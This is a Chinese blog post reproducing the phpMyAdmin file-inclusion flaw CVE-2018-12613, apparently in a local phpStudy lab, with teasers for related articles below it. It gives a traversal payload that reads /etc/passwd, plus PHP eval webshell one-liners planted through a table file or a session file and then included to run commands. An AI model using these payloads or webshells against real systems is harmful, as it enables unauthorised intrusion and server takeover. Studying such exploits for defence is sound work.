CVE-2018-12613 phpmyadmin文件包含getshell连载(三)

最新推荐文章于 2024-06-25 17:21:43 发布
最新推荐文章于 2024-06-25 17:21:43 发布
阅读量665 收藏 2
点赞数
分类专栏: web渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45447309/article/details/106949297
版权

这是phpmyadmin系列渗透思路的第三篇文章,前面一篇文章阐述了通过慢查询日志getshell,本文将通过文件包含漏洞展开讨论

原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13164349.html

#001 影响版本

Phpmyadmin 4.8.0/4.8.0.1/4.8.1

 

#002 漏洞验证利用

http://www.xxx.com/index.php?target=db_sql.php%253f/../../../../../../etc/passwd

成功读取到/etc/passwd文件

 

#003 利用此漏洞getshell

思路1:把WebShell写入到数据库中然后包含数据库文件getshell,如果把WebShell当做数据表的字段值是可以完美的写入到数据库文件当中的

 

创建完成结果如下

 

2、然后我们需要找到数据库表的文件

show variables like 'datadir' 
或
SELECT @@datadir

文件的路径就是:data路径+数据库名/表名.frm

 

然后包含它就可以,成功包含执行phpifo

index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/test/test1.frm

 

 

二、命令执行(注意一句话为GET)

插入:<?php eval($_GET[a]);?>这个字段,然后构造payload:成功执行命令

index.php?a=system("ipconfig");&target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/MySQL/data/test/test2.frm

 

三、进行getshell

ONE:插入数据表getshell

思考过程:以上所说的都是执行的phpinfo,以及get方式执行了命令,无法用蚁剑等工具直接连接shell,所以就想利用文件包含直接生成一个webshell,所以有了以下想法

 

1、我们插入字段的时候,插入这样一句话,包含之后会在当前目录生成一个a.php的webshell

<?php fputs(fopen("a.php","w"),'<?php eval($_POST[a]);?>');?>

 

可以看到,执行成功

 

2、接着上面的,包含test1.frm文件,包含完成,没有任何报错

 

3、接着去看一下是否真的能生成一句话在当前目录,可以看到的确生成了,并且时间是刚刚

 

4、然后直接利用蚁剑连接,ok思路可行,getshell成功

 

 

执行一下命令试试,完全没问题,本次探索很成功!

 

Two:利用session文件getshell

phpmyadmin是默认会把执行的语句,记录在session文件当中的,所以可以包含session文件进行getshell

 

1、首先利用上面得到的phpinfo,查看session文件存放的路径,搜索:save_path,看到是在tmp/tmp目录下

 

2、执行sql语句,语句为生成一句话木马的语句

SELECT `<?php fputs(fopen("a.php","w"),'<?php eval($_POST[a]);?>');?>`;    #注意为反引号

 

3、session可以在cookie中找到,例如google的,或者burp抓包都行

 

4、然后利用漏洞直接包含session文件,文件名:sess_你的session

index.php?target=db_sql.php%253f/../../../../../../phpStudy/PHPTutorial/tmp/tmp/sess_a5gbrbj1rr01lpqpi6mkecc1ti1ar692

 

5、然后看当前目录是否生成一句话木马,可以看到又成功生成了,时间是刚刚的

 

6、利用蚁剑连接:成功!

 

这篇文章个人感觉还是可以拓展大家一些思路的,希望大家都能学到一点技巧。

m0s30
关注
专栏目录
文件包含getshell
qq_32445755的博客
04-11 352
简介 开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 allow_url_fopen = On(是否允许打开远程文件) allow_url_include = On(默认关闭,是否允许include/require远程文件)该选项为on便是允许 包含URL 对象文件等。 PHP版本<=5.2 可以使用%00进行截断。(能截断的php版本都小于5.3) PHP共有4个与文件包含相关的函数: inc
CVE-2018-12613phpmyadmin(文件包含)漏洞复现
千寻的博客
03-07 1716
文章目录---0x00 漏洞介绍------0x01漏洞原理------0x02影响版本------0x03 漏洞修护------0x04 漏洞环境---第一步 下载phpstudy2018--->放在window server 2008里面第二步 phpstudy没有安装VC11、VC14运行库参考文档第步 下载phpMyAdmin-4.8.1-all-languages第四步 查看ph...
【漏洞复现】CVE-2018-12613 phpMyAdmin文件包含getshell
Mr_atopos的博客
05-22 462
该漏洞影响phpMyAdmin 4.8.0-4.8.1版本 checkPageValidity函数对数据的处理逻辑不够严密,利用二次url编码绕过文件包含检测 payload 通过查询在session中添加php语句,再通过文件包含执行 ?target=db_sql.php%253f/…/…/…/…/…/…/…/…/(要包含的文件) target有白名单检测机制,db_sql.php在白名单中 通过?的二次编码成%253f target在检测白名单的时候,会对db_sql.php%253f进行二次u
phpMyAdmin 4.0.10 文件包含 -> getshell
最新发布
2301_80115097的博客
06-25 901
gettype() 获取参数的属性也就是说我们的$var需要是一个数组这里的返回值就是True了还是刚刚说的那些,这里如果是Linux服务器的话,并且sql文件储存路径有大小写的话,就没办法拿到webshell了,并且还不能任意文件包含,还只能包含路径没有大写字符的,反正至少以我目前的水平是不行的,不过 linux 默认mysql文件的路径是 /var/lib/mysql/。默认情况下是无影响的。
phpMyAdmin 4.8.1后台文件包含漏洞Getshell的几种姿势
qq_45521281的博客
04-27 2430
phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑, 通过二次编码即可绕过检查,造成远程文件包含漏洞。 受影响版本: phpMyAdmin 4.8.0和4.8.1受到影响。 登陆phpmyadmin后台: 访问 http://192.168.0.13...
php文件包含getshell
Jiajiajiang_的博客
07-11 5578
今天面试被问到这个了,已经是很久以前用到了,脑子一时短路,一点也想不起来,今天想捋一遍 参考 文件包含是应用程序(在这里就是指php函数引入文件时)未对要引用的文件做合理的校验,从而恶意的使应用程序操作了意料之外的文件,将会导致文件泄露,更有甚者会导致恶意代码的注入。 先介绍一下本地文件包含LFI(Local File Include) 举个最简单的例子,新建一个php文件,命...
CVE-2018-19968 phpmyadmin文件包含getshell连载(完结)
PANDA墨森的博客
06-24 315
这是phpmyadmin系列渗透思路的第篇文章,前面一篇文章阐述了通过文件包含getshell,本文将通过另一个CVE文件包含漏洞继续展开讨论 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13169447.html #001环境搭建 在线环境:https://www.vsplate.com/?github=vulnspy/phpmyadmin-4.8.1 也可以选择自行到phpmyadmin官网下载对应版本 #002漏洞复现 1、首先登...
复现PHPMyAdminCVE-2018-12613)漏洞,并利用漏洞实现上传WebShell
qq_54713392的博客
04-20 649
复现PHPMyAdminCVE-2018-12613)漏洞 并利用漏洞实现上传WebShell 漏洞描述:   在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者
【漏洞复现】phpmyadmin后台任意文件包含CVE-2018-12613
野原新之助
09-29 800
由于对index.php中包含文件的target参数未作严格的安全校验,导致可以被利用绕过白名单、黑名单校验从而进行本地文件包含,达到GetShell和命令执行的效果。
[CVE-2014-8959] phpmyadmin任意文件包含漏洞分析(图文)
ai_64的博客
05-09 2107
0x01 漏洞描述 phpmyadmin是一款应用非常广泛的mysql数据库管理软件,基于PHP开发,这个漏洞有些年头了,看离别歌大佬的博文,感觉有点意思,找来实践一下。 任意文件包含漏洞(CVE-2014-8959)影响版本为4.0.1-4.2.12: 0x02 补丁分析 在文件libraries/gis/pma_gis_factory.php中对$type_lower多加了个判断。 作者...
CVE-2018-12613Phpmyadmin后台 任意文件包含漏洞复现
Mikasa
03-16 4541
PHPmyadmin后台文件包含漏洞 环境搭建:因为是新手,完全没有经验。。。弄了好长时间。。一开始想在本机搭建环境,于是上网上下载了一个phpmyadmin,然后下载一个phpMyAdmin-4.8.1实验,但是出现语法错误(心态炸了)。。。。 然后只能够下一个版本低的试试,于是下载了一个2016的phpstudy,然后就想放虚拟机(2003)试试,然后又炸了,因为这个版本的phpstudy需要...
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
getshell姿势()--文件包含
qq_45936617的博客
10-06 343
文件包含是指一个文件可以包含(接入)另一个文件。常见的PHP文件包含函数为include()、require()、include_once()、require_once()。文件包含可以分为本地文件包含和远程文件包含。本地文件包含只能对服务器本地文件进行包含;远程文件包含可以通过URL地址包含其他服务器的内容。在PHP环境中,远程文件包含需要的条件为allow_url_include、allow_url_fopen为开启状态:on。
利用文件包含漏洞-getshell
LJH1999ZN的博客
02-22 7453
一、什么是文件包含漏洞 文件包含是指应用程序没有对引用的文件做合理的校验,导致包含的文件中含有恶意的代码,并且执行了该代码。从而产生了文件包含漏洞 二、文件包含漏洞的利用条件 1.引用一个任意类型的文件 2.程序读取文件并且执行 、将木马程序放入某个本地文件中。 1.利用网站报错日志写入木马程序 2.利用文件上传功能,上传含有木马的任意文件 四、文件包含getshell 1.本地文件包含getshell 网站会将一些错误信息记录到日志文件中,我们可以利用这个特性将木马写入日志文件中去
phpmyadmin getshell
10-29 268
本来搞了一个站,想记录一下,结果手抖刷新了一下写文章的界面,写了一大半的文章就没了… 简单说一下, 进入 phpmyadmin 后,getshell 有两种办法。一是执行sql语句导出shell到web目录下;二是开启日志功能,改变日志文件到web目录下,然后执行sql语句,在sql语句中写php代码。 其中,方法一需要满足个条件:①数据库root权限;②知道web目录的绝对路径;③mys...
PHPmyadmin Getshell
Grey的博客
07-21 6892
1. phpMyAdmin简介 2. phpMyAdmin getshell思路 3. phpMyAdmin 4.8.1 getshell实战 SHOW VARIABLES LIKE ‘%secure_file_priv%”;   查看读写文件路径 “secure_file_priv”对应的值不能为null,为null就没办法正常写入shell 我们首先需要检测的是MyS...
浅析php文件包含及其getshell的姿势
weixin_50464560的博客
05-29 1892
0x1 前言  不管平时在打ctf或者代码审计的过程中,文件包含都是很薄弱、很常见的点,一般的开发人员可能觉得文件包含没有什么大问题,低估其造成的危害,我一个ctf爱好者也是这么认为的,直到最近打了几场ctf都出现了文件包含的点,然后被暴虐,才发现文件包含的利用面很广,所以就此打算写篇文章来记录下自己的学习过程。 0x2 认识和了解包含函数  PHP里面共有4个与文件包含相关的函数,分别是: include require include_once require_once 查看相关函数的文档了解他们
PhpMyadmin--getshell
qq_64664156的博客
09-20 624
phpMyAdmin通过MySQL日志文件getshell
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞(CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞(CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞。PHPMyAdmin是一个广受欢迎的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值